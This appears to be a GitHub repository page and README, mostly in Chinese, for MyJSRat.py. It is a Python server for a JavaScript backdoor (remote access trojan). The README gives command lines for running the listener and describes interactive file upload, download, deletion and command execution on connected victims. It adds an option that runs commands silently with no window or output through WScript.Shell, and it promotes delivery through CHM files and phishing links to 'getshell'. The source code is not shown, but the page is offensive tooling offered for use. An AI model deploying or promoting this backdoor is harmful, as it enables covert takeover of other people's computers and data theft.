This is JSRat.ps1 in Python
Python
Latest commit 1be0b81 Apr 1, 2016 @Ridter change
Permalink
Failed to load latest commit information.
classes MyJSRat Mar 29, 2016
1459259057997.png MyJSRat Mar 29, 2016
1459259883470.png MyJSRat Mar 29, 2016
1459260010566.png MyJSRat Mar 29, 2016
MyJSRat.py MyJSRat Mar 29, 2016
README.md change Apr 1, 2016
getshell.gif Add Hack demo Apr 1, 2016

README.md

MyJSRat.py

0x00 JSbackdoor

关于javascript backdoor 请查看:

JavaScript Backdoor

JavaScript Phishing

JSRat.ps1

0x01 说明

研究JSbackdoor 之后想着写一个py版的,后来发现已经有小伙伴写过了,地址如下:JSRat-Py

测试使用的时候,为了更加方便,对上面的这个脚本进行了修改,添加了-c 参数可以实现在客户端连接之后自动执行命令。具体使用方式如下:

JSRat Server
By: Evi1cg

Usage: MyJSRat.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -i IP, --ip=IP        IP to Bind Server to (i.e. 192.168.0.69)
  -p PORT, --port=PORT  Port to Run Server on
  -u URL, --url=URL     URL to Initiate Client Connection (default: /connect)
  -f, --find-ip         Display Current Internal and External IP Addresses
  -c CMD, --command=CMD
                        auto Send command to client (No interaction)
  -v                    Enable Verbose Output

-f 参数可获取内外网ip地址:

Alt text

脚本修改分为两个模式,交互模式以及执行命令模式。

交互模式命令如下

 python MyJSRat.py -i 192.168.1.101 -p 8080

-u 为可选参数,为回连url地址。

交互模式下可进行文件上传、下载、删除、命令执行等。

执行命令模式命令如下

python MyJSRat.py -i 192.168.1.101 -p 8080 -c "whoami"

执行命令模式下,会在获得shell之后自动执行指定命令,使用了new ActiveXObject("WScript.Shell").Run(command,0,true),执行无回显,无弹框。

交互界面如下:

Alt text

命令发送:

Alt text

0x02 URL 说明

0x03 实际利用

CHM + JSRAT = Getshell

Alt text

Detail : chm_backdoor